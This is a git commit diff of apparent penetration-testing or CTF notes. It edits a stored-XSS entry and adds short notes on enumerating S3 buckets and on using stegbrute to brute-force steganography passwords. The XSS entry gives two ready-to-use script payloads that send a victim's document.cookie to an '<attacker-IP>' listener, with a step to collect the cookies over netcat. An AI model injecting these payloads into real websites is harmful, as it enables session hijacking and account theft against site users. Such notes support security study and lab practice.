bump
This commit is contained in:
parent
a41a43b6e7
commit
601d2edb2e
|
@ -17,7 +17,7 @@ This is where a malicious string originates from the websites database.
|
|||
```
|
||||
* Navigte to `/logs` and take sid
|
||||
|
||||
* Open nc 4444 and
|
||||
* Open nc port and collect cookies
|
||||
```sh
|
||||
<script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
|
||||
<script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>
|
||||
|
|
|
@ -0,0 +1,7 @@
|
|||
# AWS Buckets
|
||||
|
||||
# Usage
|
||||
* Enum to s3 bucket
|
||||
```sh
|
||||
aws s3 ls s3://bucketname.region-name.amazonaws.com
|
||||
```
|
|
@ -0,0 +1,9 @@
|
|||
# Stegbrute
|
||||
Bruteforce stego jpegs with a password.
|
||||
|
||||
* install via `cargo install stegbrute`
|
||||
|
||||
## Usage
|
||||
```sh
|
||||
stegbrute -f <filename> -w <wordlist>
|
||||
```
|
Loading…
Reference in New Issue